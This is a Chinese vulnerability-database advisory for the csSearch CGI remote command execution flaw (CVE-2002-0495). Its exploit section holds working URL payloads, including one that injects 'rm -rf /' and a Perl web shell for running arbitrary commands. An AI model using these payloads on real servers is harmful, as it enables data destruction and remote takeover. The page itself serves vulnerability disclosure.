CSSearch远程命令执行漏洞

CSSearch远程命令执行漏洞

漏洞ID 1106655 漏洞类型 未知
发布时间 2002-03-26 更新时间 2005-05-02
图片[1]-CSSearch远程命令执行漏洞-安全小百科CVE编号 CVE-2002-0495
图片[2]-CSSearch远程命令执行漏洞-安全小百科CNNVD-ID CNNVD-200208-114
漏洞平台 CGI CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/21354
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-114
|漏洞详情
csSearch是一款由perl实现的WEB站点搜索脚本,可以运行在Unix和Linux操作系统下,也可运行在MicrosoftWindows操作系统平台下。csSearch由于在对提交给csSearch.cgi脚本的参数没有充分过滤输入,可导致攻击者以httpd权限执行任意命令。csSearch把配置数据作为perl代码存在”setup.cgi”文件上,由于访问验证错误,任意用户可以把配置数据提交给csSearch.cgi的变量中并写入到”setup.cgi”,因此导致perl代码以httpd进程的权限执行。
|漏洞EXP
source: http://www.securityfocus.com/bid/4368/info

csSearch is a website search script, written in Perl. It will run on most Unix and Linux variants, as well as Microsoft operating systems.

csSearch is prone to an issue which may enable an attacker to execute Perl code with the privileges of the webserver process.

For exploitation to be successful, the attacker must pass properly URL encoded Perl code in CGI parameters via a web request. For example:

http://host/cgi-bin/csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE 

Configuration data is saved with the following URL.
Note that any perl code would need to be URL encoded.

csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE

For example, the classic "rm -rf /" example would be
as follows:

csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`

Here's something a little more interesting, less than
300 bytes of code that turns csSearch into a remote
web shell of sorts.

*ShowSearchForm = *Login = sub {
print "<form method=post action=csSearch.cgi>Enter
Command (eg: ls -l)<br>";
print "<input type=text name=cmd size=99> ";
print "<input type=submit value=Execute><hr><xmp>";
$in{'cmd'} && print `$in{'cmd'} 2>&1`;
exit;
};

URL Encoded as:

csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Comm
and+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26
%26print`$in{'cmd'}+2>%261`;exit;};
|参考资料

来源:BID
名称:4368
链接:http://www.securityfocus.com/bid/4368
来源:XF
名称:cssearch-url-execute-commands(8636)
链接:http://www.iss.net/security_center/static/8636.php
来源:BUGTRAQ
名称:20020325CGIscript.net-csSearch.cgi-RemoteCodeExecution(upto17,000sitesvulnerable)
链接:http://www.securityfocus.com/archive/1/264169
来源:www.cgiscript.net
链接:http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command;=viewone&id;=7

相关推荐: BrightStor ARCserve/Enterprise Backup UDP Probe Remote Buffer Overflow Vulnerability

BrightStor ARCserve/Enterprise Backup UDP Probe Remote Buffer Overflow Vulnerability 漏洞ID 1097106 漏洞类型 Boundary Condition Error 发布…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享